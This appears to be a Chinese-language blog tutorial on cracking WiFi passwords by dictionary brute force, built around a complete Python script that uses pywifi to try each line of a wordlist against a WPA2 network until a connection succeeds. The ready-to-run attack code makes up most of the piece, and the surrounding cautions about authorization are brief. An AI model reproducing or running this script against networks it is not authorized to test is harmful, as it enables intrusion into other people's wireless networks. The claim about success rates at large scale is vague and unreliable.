一、背景介绍
WiFi密码是我们日常生活中必不可少的一部分,而许多人在设置密码时却往往不够复杂化,容易被破解。其中,常用的一种破解方式就是跑字典暴力解密。
跑字典,即使用一个包含常见密码的文件,枚举所有的可能性进行尝试,直到猜对为止。这种方式的特点是速度快,而且对于弱密码来说成功率也较高。
作为一种密码破解方式,跑字典在一些合法的场景下也是可被接受的。例如,公司内部安全测试团队通过跑字典方式测试公司的内部WiFi安全性。
二、跑字典暴力解密WiFi的实现
跑字典暴力解密一般通过编写脚本实现,以下是实现跑字典暴力解密的Python代码:
import pywifi
from pywifi import const
import time
class PoJie():
def __init__(self, path):
self.file = open(path, 'r', errors='ignore')
def readPassWord(self):
while True:
try:
myStr = self.file.readline()
if not myStr:
break
bool1 = self.test_connect(myStr)
if bool1:
print("密码正确:", myStr)
break
else:
print("密码错误:" + myStr)
except:
continue
def test_connect(self, findStr):
wifi = pywifi.PyWiFi() #抓取网卡接口
iface = wifi.interfaces()[0] #抓取第一个无限网卡
iface.disconnect() #测试链接断开所有链接
time.sleep(1) #sleep 1秒
profile = pywifi.Profile() #创建wifi链接文件
profile.ssid = "WiFi名称" #wifi名称
profile.auth = const.AUTH_ALG_OPEN #网卡的开放,
profile.akm.append(const.AKM_TYPE_WPA2PSK) #wifi加密算法
profile.cipher = const.CIPHER_TYPE_CCMP #加密单元
profile.key = findStr #密码
iface.remove_all_network_profiles() #删除所有的wifi文件
tmp_profile = iface.add_network_profile(profile)#设定新的链接文件
iface.connect(tmp_profile)#链接
time.sleep(5)#不确定这里是否要设置
if iface.status() == const.IFACE_CONNECTED: #判断是否链接上
isOK = True
else:
isOK = False
iface.disconnect() #断开
time.sleep(1)#断开1秒
#检查断开状态
assert iface.status() in\
[const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]
return isOK
path = 'word.txt'
# 定义破解对象类
a = PoJie(path)
a.readPassWord()
三、跑字典暴力解密WiFi的注意事项
虽然跑字典暴力解密WiFi的方式看似简单直接,但在实践中需要注意一些事项,以确保破解的合法性。
首先,跑字典是一种密码破解方式,而密码破解本质上是一种侵入行为,因此在进行跑字典暴力解密之前必须取得授权。
其次,在进行跑字典暴力解密时,必须保证自己的行为不会对他人造成影响,例如通过盗用他人的网络进行跑字典暴力解密。
最后,跑字典暴力解密只适用于小规模的破解尝试。在大规模攻击中,跑字典暴力解密的成功率会大幅降低,甚至不足一半。
四、总结
本文介绍了跑字典暴力解密WiFi的实现和注意事项,同时也提醒大家在使用跑字典暴力解密方式测试网络时一定要取得授权并保证合法性。
